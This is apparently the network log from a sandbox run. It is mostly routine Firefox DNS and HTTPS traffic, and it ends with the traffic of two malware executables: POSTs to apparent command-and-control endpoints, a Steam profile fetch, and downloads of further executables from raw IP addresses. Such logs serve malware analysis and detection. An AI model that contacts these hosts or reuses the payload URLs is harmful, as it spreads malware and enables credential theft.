                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN A
                    Response
                    shavar.prod.mozaws.net
                    IN A
                    44.228.225.150
                    shavar.prod.mozaws.net
                    IN A
                    35.85.93.176
                    shavar.prod.mozaws.net
                    IN A
                    54.213.181.160
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN A
                    Response
                    shavar.prod.mozaws.net
                    IN A
                    54.213.181.160
                    shavar.prod.mozaws.net
                    IN A
                    35.85.93.176
                    shavar.prod.mozaws.net
                    IN A
                    44.228.225.150
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    34.160.144.191
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    34.160.144.191
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    2600:1901:0:74e4::
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN AAAA
                    Response
                    youtube.com
                    IN AAAA
                    2a00:1450:4009:816::200e
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    2600:1901:0:92a9::
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-gb
                    GET
                    https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                    firefox.exe
                    Remote address:
                    216.58.213.14:443
                    Request
                    GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                    host: youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-gb
                    GET
                    https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    firefox.exe
                    Remote address:
                    216.58.213.14:443
                    Request
                    GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                    host: www.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    cookie: YSC=bnzIUPKHiDU
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    DNS
                    14.213.58.216.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    14.213.58.216.in-addr.arpa
                    IN PTR
                    Response
                    14.213.58.216.in-addr.arpa
                    IN PTR
                    ber01s14-in-f14.1e100.net
                    14.213.58.216.in-addr.arpa
                    IN PTR
                    lhr25s25-in-f14.1e100.net
                  • flag-us
                    DNS
                    www.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.youtube.com
                    IN A
                    Response
                    www.youtube.com
                    IN CNAME
                    youtube-ui.l.google.com
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.213.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                  • flag-us
                    DNS
                    www.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.youtube.com
                    IN A
                    Response
                    www.youtube.com
                    IN CNAME
                    youtube-ui.l.google.com
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    216.58.213.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN A
                    Response
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN AAAA
                    Response
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:826::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:822::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:827::200e
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-gb
                    GET
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    firefox.exe
                    Remote address:
                    142.250.200.46:443
                    Request
                    GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                    host: consent.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    cookie: YSC=bnzIUPKHiDU
                    cookie: SOCS=CAAaBgiAid66Bg
                    cookie: __Secure-YEC=CgtFU0FRaWRqZXZBRSjDtuK6BjIKCgJHQhIEGgAgYw%3D%3D
                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgYw%3D%3D
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    firefox-settings-attachments.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-settings-attachments.cdn.mozilla.net
                    IN A
                    Response
                    firefox-settings-attachments.cdn.mozilla.net
                    IN CNAME
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN AAAA
                    Response
                    consent.youtube.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                  • flag-us
                    GET
                    https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                    firefox.exe
                    Remote address:
                    34.117.121.53:443
                    Request
                    GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/2.0
                    host: firefox-settings-attachments.cdn.mozilla.net
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    te: trailers
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                  • flag-us
                    DNS
                    160.181.213.54.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    160.181.213.54.in-addr.arpa
                    IN PTR
                    Response
                    160.181.213.54.in-addr.arpa
                    IN PTR
                    ec2-54-213-181-160.us-west-2.compute.amazonaws.com
                  • flag-us
                    DNS
                    238.16.217.172.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    238.16.217.172.in-addr.arpa
                    IN PTR
                    Response
                    238.16.217.172.in-addr.arpa
                    IN PTR
                    mad08s04-in-f14.1e100.net
                    238.16.217.172.in-addr.arpa
                    IN PTR
                    lhr48s28-in-f14.1e100.net
                  • flag-us
                    DNS
                    150.225.228.44.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    150.225.228.44.in-addr.arpa
                    IN PTR
                    Response
                    150.225.228.44.in-addr.arpa
                    IN PTR
                    ec2-44-228-225-150.us-west-2.compute.amazonaws.com
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-gb
                    GET
                    https://www.google.com/favicon.ico
                    firefox.exe
                    Remote address:
                    142.250.187.196:443
                    Request
                    GET /favicon.ico HTTP/2.0
                    host: www.google.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: image/avif,image/webp,*/*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    referer: https://consent.youtube.com/
                    sec-fetch-dest: image
                    sec-fetch-mode: no-cors
                    sec-fetch-site: cross-site
                    te: trailers
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN AAAA
                    Response
                    www.google.com
                    IN AAAA
                    2a00:1450:4009:81f::2004
                  • flag-us
                    DNS
                    74.204.58.216.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    Response
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    lhr25s13-in-f74.1e100.net
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    lhr48s49-in-f10.1e100.net
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    lhr25s13-in-f10.1e100.net
                  • flag-us
                    DNS
                    195.187.250.142.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    195.187.250.142.in-addr.arpa
                    IN PTR
                    Response
                    195.187.250.142.in-addr.arpa
                    IN PTR
                    lhr25s33-in-f3.1e100.net
                  • flag-us
                    DNS
                    196.187.250.142.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    196.187.250.142.in-addr.arpa
                    IN PTR
                    Response
                    196.187.250.142.in-addr.arpa
                    IN PTR
                    lhr25s33-in-f4.1e100.net
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    35.244.181.201
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    35.244.181.201
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    201.181.244.35.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    201.181.244.35.in-addr.arpa
                    IN PTR
                    Response
                    201.181.244.35.in-addr.arpa
                    IN PTR
                    201.181.244.35.bc.googleusercontent.com
                  • flag-us
                    DNS
                    ciscobinary.openh264.org
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ciscobinary.openh264.org
                    IN A
                    Response
                    ciscobinary.openh264.org
                    IN CNAME
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com
                    a17.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com.mdc.edgesuite.net
                    a17.rackcdn.com.mdc.edgesuite.net
                    IN CNAME
                    a19.dscg10.akamai.net
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                  • flag-us
                    DNS
                    ciscobinary.openh264.org
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ciscobinary.openh264.org
                    IN A
                    Response
                    ciscobinary.openh264.org
                    IN CNAME
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com
                    a17.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com.mdc.edgesuite.net
                    a17.rackcdn.com.mdc.edgesuite.net
                    IN CNAME
                    a19.dscg10.akamai.net
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                  • flag-gb
                    GET
                    http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                    firefox.exe
                    Remote address:
                    88.221.134.155:80
                    Request
                    GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
                    Host: ciscobinary.openh264.org
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    Accept: */*
                    Accept-Language: en-US,en;q=0.5
                    Accept-Encoding: gzip, deflate
                    Connection: keep-alive
                    Response
                    HTTP/1.1 200 OK
                    Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
                    ETag: 09372174e83dbbf696ee732fd2e875bb
                    Content-Length: 491284
                    Accept-Ranges: bytes
                    X-Timestamp: 1731033473.13891
                    Content-Type: application/zip
                    X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
                    Cache-Control: public, max-age=124682
                    Expires: Thu, 12 Dec 2024 06:27:44 GMT
                    Date: Tue, 10 Dec 2024 19:49:42 GMT
                    Connection: keep-alive
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN A
                    Response
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN A
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN AAAA
                    Response
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:869b
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:86d1
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN AAAA
                    Response
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:86d1
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:869b
                  • flag-us
                    DNS
                    155.134.221.88.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    155.134.221.88.in-addr.arpa
                    IN PTR
                    Response
                    155.134.221.88.in-addr.arpa
                    IN PTR
                    a88-221-134-155.deploy.static.akamaitechnologies.com
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.187.206
                  • flag-gb
                    GET
                    https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                    firefox.exe
                    Remote address:
                    142.250.187.206:443
                    Request
                    GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
                    host: redirector.gvt1.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    te: trailers
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.187.206
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN AAAA
                    Response
                    redirector.gvt1.com
                    IN AAAA
                    2a00:1450:4009:81f::200e
                  • flag-us
                    DNS
                    r4---sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4---sn-aigzrnsz.gvt1.com
                    IN A
                    Response
                    r4---sn-aigzrnsz.gvt1.com
                    IN CNAME
                    r4.sn-aigzrnsz.gvt1.com
                    r4.sn-aigzrnsz.gvt1.com
                    IN A
                    74.125.175.169
                  • flag-us
                    DNS
                    r4---sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4---sn-aigzrnsz.gvt1.com
                    IN A
                  • flag-gb
                    GET
                    https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com
                    firefox.exe
                    Remote address:
                    74.125.175.169:443
                    Request
                    GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com HTTP/1.1
                    Host: r4---sn-aigzrnsz.gvt1.com
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    Accept: */*
                    Accept-Language: en-US,en;q=0.5
                    Accept-Encoding: gzip, deflate, br
                    Connection: keep-alive
                    Response
                    HTTP/1.1 200 OK
                    Accept-Ranges: bytes
                    Cache-Control: public,max-age=86400
                    Content-Disposition: attachment
                    Content-Length: 14485862
                    Content-Security-Policy: default-src 'none'
                    Content-Type: application/zip
                    Etag: "1d3918c"
                    Server: downloads
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    X-Xss-Protection: 0
                    Date: Tue, 10 Dec 2024 09:04:14 GMT
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
                    Connection: keep-alive
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                    Vary: Origin
                  • flag-us
                    DNS
                    r4.sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4.sn-aigzrnsz.gvt1.com
                    IN A
                    Response
                    r4.sn-aigzrnsz.gvt1.com
                    IN A
                    74.125.175.169
                  • flag-us
                    DNS
                    r4.sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4.sn-aigzrnsz.gvt1.com
                    IN AAAA
                    Response
                    r4.sn-aigzrnsz.gvt1.com
                    IN AAAA
                    2a00:1450:4009:1b::9
                  • DNS (US)
                    206.187.250.142.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    206.187.250.142.in-addr.arpa
                    IN PTR
                    Response
                    206.187.250.142.in-addr.arpa
                    IN PTR
                    lhr25s33-in-f14.1e100.net
                  • DNS (US)
                    169.175.125.74.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    169.175.125.74.in-addr.arpa
                    IN PTR
                    Response
                    169.175.125.74.in-addr.arpa
                    IN PTR
                    lhr48s34-in-f9.1e100.net
                  • 104.21.96.1:443
                    https://atten-supporse.biz/api
                    tls, http
                    2g5323.exe
                    1.1kB
                    4.7kB
                    11
                    8

                    HTTP Request

                    POST https://atten-supporse.biz/api

                    HTTP Response

                    200
                  • 172.67.206.64:443
                    https://covery-mover.biz/api
                    tls, http
                    2g5323.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://covery-mover.biz/api

                    HTTP Response

                    200
                  • 185.215.113.43:80
                    http://185.215.113.43/Zu7JuNko/index.php
                    http
                    skotes.exe
                    2.9kB
                    3.6kB
                    22
                    15

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200
                  • 23.214.143.155:443
                    https://steamcommunity.com/profiles/76561199724331900
                    tls, http
                    2g5323.exe
                    1.8kB
                    43.2kB
                    27
                    37

                    HTTP Request

                    GET https://steamcommunity.com/profiles/76561199724331900

                    HTTP Response

                    200
                  • 31.41.244.11:80
                    http://31.41.244.11/files/unique2/random.exe
                    http
                    skotes.exe
                    553.0kB
                    16.7MB
                    11828
                    16465

                    HTTP Request

                    GET http://31.41.244.11/files/6904700471/Z9Pp9pM.exe

                    HTTP Response

                    200

